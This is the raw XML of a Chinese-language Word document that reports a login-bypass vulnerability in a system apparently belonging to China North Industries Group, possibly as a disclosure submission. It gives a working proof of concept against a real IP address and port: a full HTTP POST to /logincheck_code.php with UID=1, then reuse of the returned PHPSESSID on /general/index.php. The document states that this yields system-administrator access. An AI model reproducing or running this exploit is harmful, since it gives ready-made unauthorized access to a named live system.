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F13EC" w14:textId="58D10093" w:rsidR="00B316FA" w:rsidRPr="00291610" w:rsidRDefault="00291610">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291610">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>中国兵器工业集团有限公司</w:t>
      </w:r>
      <w:r w:rsidR="00B04CCC" w:rsidRPr="00B04CCC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>绕过登录漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C824151" w14:textId="4DA890D3" w:rsidR="00291610" w:rsidRDefault="00291610">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1访问网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C8C80A" w14:textId="6FAF1C38" w:rsidR="002F5E72" w:rsidRDefault="002F5E72">
      <w:r w:rsidRPr="002F5E72">
        <w:t>http://61.184.199.14:8989</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E86FF9" w14:textId="67BFC133" w:rsidR="00291610" w:rsidRDefault="00291610">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F68E1FA" wp14:editId="5458A506">
            <wp:extent cx="5274310" cy="28308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2B44" w14:textId="4B257144" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包构建poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E25CBC" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:t>POST /logincheck_code.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C5AEA" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:t>Host: 61.184.199.14:8989</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08627B" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6C740" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:t>Content-Length: 56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206C66E" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F73E41" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:t>Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C2AB6" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72"/>
    <w:p w14:paraId="098B5364" w14:textId="2A80517E" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:t>UID=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D91CC" w14:textId="0EAD76E8" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FB7590E" wp14:editId="45676451">
            <wp:extent cx="5274310" cy="3646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EAA4" w14:textId="4550EAFB" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录返回的</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5E72">
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D61EF3" w14:textId="59BEF3B2" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在漏洞url后构建poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D97E88E" w14:textId="02649ED0" w:rsidR="002F5E72" w:rsidRDefault="002F5E72">
      <w:r w:rsidRPr="002F5E72">
        <w:t>http://61.184.199.14:8989/general/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5533D" w14:textId="070E86FB" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE8D8CE" w14:textId="3C2CEC08" w:rsidR="00291610" w:rsidRDefault="002F5E72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2267C4DA" wp14:editId="7F886371">
            <wp:extent cx="5274310" cy="28187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4AE5" w14:textId="77777777" w:rsidR="002F5E72" w:rsidRDefault="002F5E72" w:rsidP="002F5E72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换刚才记录的</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5E72">
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF04D8E" w14:textId="7DE9B330" w:rsidR="00291610" w:rsidRDefault="004335F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="098C41C9" wp14:editId="490B7BCF">
            <wp:extent cx="5274310" cy="28321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2664" w14:textId="48B84B53" w:rsidR="00291610" w:rsidRDefault="004335F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过登陆成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFC182" w14:textId="4EDD22E4" w:rsidR="00291610" w:rsidRDefault="004335F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149061E4" wp14:editId="502CA92C">
            <wp:extent cx="5274310" cy="2829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486B" w14:textId="22D1A27A" w:rsidR="00291610" w:rsidRDefault="004335F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看权限位系统管理员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DADF35" w14:textId="29FD5948" w:rsidR="00291610" w:rsidRDefault="004335F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F6CE2" w14:textId="1CE0E256" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="7A57B49C" w14:textId="11B8CDCB" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="79BBA7CE" w14:textId="2F21797B" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="323E3009" w14:textId="16C5A6A2" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="379654C4" w14:textId="1D3EBAB9" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="0A8E04AE" w14:textId="055646E7" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="59EACE87" w14:textId="2001FD3E" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="075CF218" w14:textId="13C02989" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="4E0623B1" w14:textId="5C941C9C" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="391A684F" w14:textId="45207E28" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:p w14:paraId="0A94AE1C" w14:textId="77777777" w:rsidR="00291610" w:rsidRDefault="00291610"/>
    <w:sectPr w:rsidR="002916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7CA"/>
    <w:rsid w:val="00291610"/>
    <w:rsid w:val="002F5E72"/>
    <w:rsid w:val="004335F0"/>
    <w:rsid w:val="006B37CA"/>
    <w:rsid w:val="00792489"/>
    <w:rsid w:val="00B04CCC"/>
    <w:rsid w:val="00B3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45C50"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2A0A6AB4-171E-48DC-9EB9-ABF85171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川田</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>川田</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-06T06:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-07T00:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>